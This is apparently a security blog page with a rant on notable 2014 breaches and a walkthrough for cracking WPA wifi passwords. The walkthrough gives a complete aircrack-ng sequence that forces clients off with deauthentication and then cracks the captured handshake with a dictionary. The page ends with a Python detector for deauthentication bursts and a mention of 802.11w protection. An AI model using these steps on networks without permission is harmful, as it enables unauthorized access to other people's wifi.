• CRASS – Look back at 2014

    With January 2015 coming to an end and 2014 seeming like a distant memory in the rear-view mirror, I thought it was a good time to reflect upon some of the notable security incidents and the impact they’ve had (if any) in the long term.

    There were many to choose from – which is great from a content perspective, but horribly depressing when you consider what this means for the security trade as a whole. Honourable mentions should also go to JP Morgan, eBay and anything relating to the NSA.

    But with this coming in at nearly 7 and a half minutes, I’m not sure how much longer I could have ranted for without losing my voice and sounding like that crazy dude who comes up with all the conspiracy theories.

  • Cracking wifi passwords with Kali Linux

    I haven’t really done a technical walkthrough-type video and I now remember why I never did. These things are hard to do and involve two of my least favourite elements of video-making: screen captures and voiceovers. Which is why I always tip my hat to Vivek and his great tutorials over at SecurityTube.net.

    The idea behind this video was one of those posts on Facebook where a ‘clever’ parent changes the WiFi password and blackmails the child into first doing homework and chores before being able to access the net.

    In the video, I kind of glossed over some steps and was a bit quick, so for completeness here are the commands you need once you get Kali up and running and have an injection-capable wireless adapter.

    1. airmon-ng (will list all wireless cards)
    2. airmon-ng start wlan0 (or whatever your wireless card is – it will start monitor mode; mine was mon0)
    3. airodump-ng mon0
    4. Ctrl+C (once you see the network you want to connect to)
    5. airodump-ng -c [channel] --bssid [bssid] -w /root/Desktop/Catch mon0 (replace channel and bssid accordingly)
    6. Open a second terminal window
    7. aireplay-ng -0 2 -a [router bssid] -c [client bssid] mon0
    8. You should see the message that you’ve captured the handshake, so hit Ctrl+C
    9. aircrack-ng -a2 -b [router bssid] -w [path to dictionary] /root/Desktop/*.cap
    10. That’s it – you should have captured the password, if it’s in the dictionary you downloaded.

    As with any security testing, I need not remind you that these kinds of tests should only be done on equipment you own or have permission to test.

    Now, in reality, pulling something like this off isn’t very difficult. In under a dozen commands you can potentially grab a wifi password, which is script kiddie territory. The real question goes a lot deeper: what can be done with this information? What other information is within the .CAP file? Can this be automated and chained? How can this scenario be run in different ways from an attacker’s perspective – and also how can you use this knowledge to build better defences?
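On the defence question, step 7 is the noisy part: it puts deauthentication frames on the air, and those show up in any monitor-mode capture. The following is an added example, not code from the original post, that reads a capture file and flags bursts of deauthentication/disassociation frames per network and destination. It assumes a classic pcap file with link type 105 (raw 802.11) or 127 (radiotap); the threshold, window and sample MAC addresses are constructed for illustration.

```python
import struct
from collections import defaultdict

DEAUTH, DISASSOC = 0xC0, 0xA0  # first frame-control byte: management subtype 12 / 10

def mgmt_kicks(pcap):
    """Yield (time, bssid, destination, reason) for each deauth/disassoc frame."""
    magic = struct.unpack("<I", pcap[:4])[0]
    if magic not in (0xA1B2C3D4, 0xD4C3B2A1):
        raise ValueError("not a classic pcap file")
    end = "<" if magic == 0xA1B2C3D4 else ">"
    linktype = struct.unpack(end + "I", pcap[20:24])[0]
    if linktype not in (105, 127):  # raw 802.11, or radiotap + 802.11
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(pcap):
        sec, usec, incl, _ = struct.unpack(end + "IIII", pcap[off:off + 16])
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if linktype == 127 and len(frame) >= 4:  # radiotap length is little-endian
            frame = frame[struct.unpack("<H", frame[2:4])[0]:]
        if len(frame) >= 26 and frame[0] in (DEAUTH, DISASSOC):
            # addr1 = destination [4:10], addr3 = BSSID [16:22], reason code [24:26]
            yield (sec + usec / 1e6, frame[16:22].hex(":"), frame[4:10].hex(":"),
                   struct.unpack("<H", frame[24:26])[0])

def deauth_bursts(pcap, threshold=10, window=1.0):
    """Map (bssid, destination) -> peak frame count inside any `window` seconds."""
    seen = defaultdict(list)
    for ts, bssid, dst, _ in mgmt_kicks(pcap):
        seen[(bssid, dst)].append(ts)
    alerts = {}
    for key, times in seen.items():
        times.sort()
        lo = peak = 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:  # slide the window start forward
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak >= threshold:  # threshold is an assumed value, tune per site
            alerts[key] = peak
    return alerts

def sample_capture():
    """Constructed capture: 12 deauths to one client in under 0.1 s, one stray disassoc."""
    ap, sta, other = (bytes.fromhex("02000000000" + d) for d in "123")
    def rec(usec, fc0, dst):
        frame = bytes([fc0, 0, 0, 0]) + dst + ap + ap + b"\x00\x00" + struct.pack("<H", 7)
        return struct.pack("<IIII", 1000, usec, len(frame), len(frame)) + frame
    hdr = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 105)
    return hdr + b"".join(rec(i * 8000, DEAUTH, sta) for i in range(12)) + rec(500000, DISASSOC, other)
```

Calling `deauth_bursts(sample_capture())` returns the one AP/client pair that received 12 frames in a tenth of a second and ignores the single disassociation. Where the access point and clients support 802.11w (Protected Management Frames), forged deauthentication frames are rejected, which removes the forced-reconnect step altogether.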